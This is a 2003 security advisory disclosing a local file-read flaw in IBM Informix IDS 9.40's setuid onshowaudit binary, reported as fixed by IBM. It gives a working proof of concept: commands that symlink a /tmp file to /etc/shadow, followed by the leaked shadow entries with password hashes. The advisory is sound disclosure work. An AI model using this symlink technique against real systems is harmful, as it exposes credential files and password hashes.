open3sIDSonshowaudit.txt

`  
----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========----------  
  
Title: Local Vulnerability in IBM Informix IDS v9.40 onshowaudit binary  
Date: 08-08-2003  
Platform: Only tested in Linux but can be exported to others.  
Impact: Users with exec perm over ./bin/onshowaudit can read   
all system files.  
Author: Juan Manuel Pascual Escriba <[email protected]>  
Status: Solved by IBM Corp  
  
  
PROBLEM SUMMARY:  
  
Informix user or any user with AAO privileges can execute onshowaudit. This binary   
is owned by root.informix with 6755 permision. As the endly point of its execution   
thread onshowaudit try to read some files in /tmp directory without dropping any   
privileges.  
  
It's easy for an intruder to make a link to /etc/shadow or /root/.ssh/authorized_keys   
of one of this files and read this files.  
  
  
DESCRIPTION  
  
Informix user or any user with AAO privileges an execute onshowaudit. This binary  
is owned by root.informix with 6755 permision. As the endly point of its execution  
thread onshowaudit reads  
  
16231 open("/tmp/.0", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)  
16231 open("/tmp/.1", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)  
16231 open("/tmp/.2", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)  
....  
16231 open("/tmp/.97", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)  
16231 open("/tmp/.98", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)  
16231 write(2, "Cannot open file \n", 18) = 18  
  
without dropping privileges. It's easy to make a link:  
  
[informix@dimoni tmp]$ ls -alc /etc/shadow  
-r-------- 1 root root 1020 Aug 10 01:59 /etc/shadow  
[informix@dimoni tmp]$ ln -s /etc/shadow .0  
informix@dimoni tmp]$ /home/informix-9.40/bin/onshowaudit  
  
wait for the output  
....  
aaa:!!:11635:0:99999:7:::  
pask:$1$4xnwc%eu$DfkZv8cTe6wywzom0:11938:0:99999:7:::  
bbb:!!:11636:0:99999:7:::  
cccc:!!:11636:0:99999:7:::  
ddddd:!!:11647:0:99999:7:::  
aaaaaa:!!:11806:0:99999:7:::  
wwwwww:!!:11833:0:99999:7:::  
zzz:!!:12027:0:99999:7:::  
informix:$1$G8jXuut9eWsIiDsgwQb1KcPcfA/:12272:0:99999:7:::  
  
Program Over.  
  
  
IMPACT:  
  
Any user with AAO privileges over onshowaudit could read any system file.   
  
  
  
STATUS   
  
Reported to IBM security team at 11th of August 2003  
  
See more infomartion about this vulnerability and workaround at:  
http://www-1.ibm.com/support/docview.wss?uid=swg21153336  
  
This vulnerability was managed in an efficient manner by Jonathan Leffler  
from IBM Informix Database Engineering Team.  
  
  
--------------------------------------------------  
This vulnerability was researched by:  
Juan Manuel Pascual Escriba [email protected]  
Barcelona - Spain http://www.open3s.com  
  
`